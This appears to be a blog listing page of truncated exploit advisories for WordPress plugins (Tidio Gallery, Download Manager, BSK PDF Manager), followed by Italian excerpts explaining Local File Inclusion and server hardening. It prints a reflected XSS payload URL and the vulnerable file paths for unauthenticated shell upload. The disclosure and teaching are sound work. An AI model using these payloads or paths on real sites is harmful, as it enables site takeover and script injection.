######################
# Exploit Title : WordPress Tidio Gallery 1.1 Shell Upload and XSS Vulnerabilities
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.tidioelements.com/
# Software Link : http://downloads.wordpress.org/plugin/tidio-gallery.zip
# Date : 2014-07-14
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location : http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php -> XSS
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-post.php -> Upload Shell
######################
# Vulnerablity n°1:
XSS Reflected Unauthenticated
http://VICTIM/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId="/><script>alert(1);</script>
# Vulnerablity n°2:
Unprivileged user like subscriber could upload shell script....
######################
# Exploit Title : WordPress Download Manager 2.6.8 Shell Upload Vulnerability
# Exploit Author : Claudio Viviani
# Vendor Homepage : www.wpdownloadmanager.com
# Software Link : http://downloads.wordpress.org/plugin/download-manager.zip
# Date : 2014-07-11
# Tested on : Linux / Mozilla Firefox / WordPress Download Manager 2.6.8 Free Version
# # # WORK ONLY ON SERVER WITH .HTACCESS FILES DISABLED
######################
# Location : http://IP_VICTIM/wp-content/plugins/download-manager/wpdm-add-new-file.php
######################
# Description :
WordPress Download Manager 2....
######################
# Exploit Title : WordPress BSK PDF Manager 1.3.2 Authenticated SQL Injection
# Exploit Author : Claudio Viviani
# Vendor Homepage : http://www.bannersky.com/bsk-pdf-manager/
# Software Link : http://downloads.wordpress.org/plugin/bsk-pdf-manager.zip
# Date : 2014-07-04
# Tested on : Windows 7 / Mozilla Firefox
# Linux / Mozilla Firefox
# Linux / sqlmap 1.0-dev-5b2ded0
######################
# Location : http://localhost/wp-content/plugins/compfight/compfight-search.php
######################
# Vulnerable code :
[claudio@localhost ~]$ grep -R GET bsk-pdf-manager/
bsk-pdf-manager/inc/bsk-pdf-dashboard.php: if(isset($_GET['view']) && $_GET['view']){
bsk-pdf-manager/inc/bsk-pdf-dashboard....
Nella prima parte dell’articolo ho spiegato cosa è la vulnerabilità LFI soffermandomi anche su alcune tecniche di protezione a livello di programmazione, mentre in questo post affronterò l’aspetto sistemistico.
Per circoscrivere l’area di lavoro di un applicativo web, e quindi di un eventuale Local File Inclusion, è possibile ricorrere almeno a tre soluzioni:
Utilizzo della funzione php open_basedir Configurazione di un ambiente chroot per Apache Applicazione delle regole di selinux per Apache PHP openbasedir anti LFI La funzione php open_basedir permette di limitare l’area d’azione di un applicativo ed è possibile configurarla a livello globale o tramite virtualhost specifici....
LFI – Introduzione Analizzando pagine web dinamiche di vari siti o ad esempio dei CMS (WordPress, Drupal, Joomla) è possibile notare come gli sviluppatori ottimizzino il codice distribuendolo su più pagine.
In questo modo i programmatori evitano di creare file (ad esempio php) troppo grandi e di conseguenza meno chiari/flessibili.
Per incorporare il contenuto di una pagina php dentro l’altra, vengono utilizzate le funzioni:
include(‘pagina2.php’);
include_once(‘pagina2.php’);
require(‘pagina2.php’);
require_once(‘pagina2.php’);
Cosa può accadere se il nome della pagine inclusa viene richiamata col metodo GET o POST senza l’inserimento di adeguati filtri?...